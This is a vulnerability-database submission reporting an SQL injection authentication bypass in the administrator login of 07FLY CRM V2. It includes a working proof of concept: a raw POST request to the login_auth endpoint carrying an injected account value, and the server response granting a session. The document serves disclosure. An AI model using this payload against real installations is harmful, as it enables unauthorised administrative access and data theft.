| 标题 | An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login page |
|---|
| 描述 | 07FLY CRM V2 在登录管理员登录页面时被发现容易受到通过 SQL 注入进行身份验证绕过的攻击。攻击可以远程发起。
07FLY CRM官方网站:https://gitee.com/07fly/FLY-CRM
# An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login
# Description
07FLY CRM was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page. The attack can be initiated remotely.
# Vulnerability Type
SQL Inject
# Vendor of Product
07FLY CRM v2
# Affected Product Code Base
https://gitee.com/07fly/FLY-CRM
# Attack Type
Remote
# Proof of Concept
```
Request:
POST /index.php/sysmanage/Login/login_auth/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://www.fly.net/
Content-Length: 79
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: www.fly.net
Connection: Keep-alive
account=-1'%20OR%203*2*1=6%20AND%20000189=000189%20or%20'QMZIxlBw'='&password=1
```
```
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sat, 09 Sep 2023 12:14:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Set-Cookie: PHPSESSID=nj2a14ltn5cfgsomfr4iq6ss83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 126
{"statusCode":"200","message":"\/index.php\/sysmanage\/Index\/","navTabId":"","rel":"1","callbackType":"","forwardUrl":""}
``` |
|---|
| 来源 | ⚠️ https://github.com/chosir/exp/tree/main |
|---|
| 用户 | alice2014 (UID 54262) |
|---|
| 提交 | 2023-09-09 15時29分 (3 年前) |
|---|
| 管理 | 2023-09-16 09時15分 (7 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 239861 [07FLY CRM V2 Administrator Login Page login_auth 帐户 SQL注入] |
|---|
| 积分 | 20 |
|---|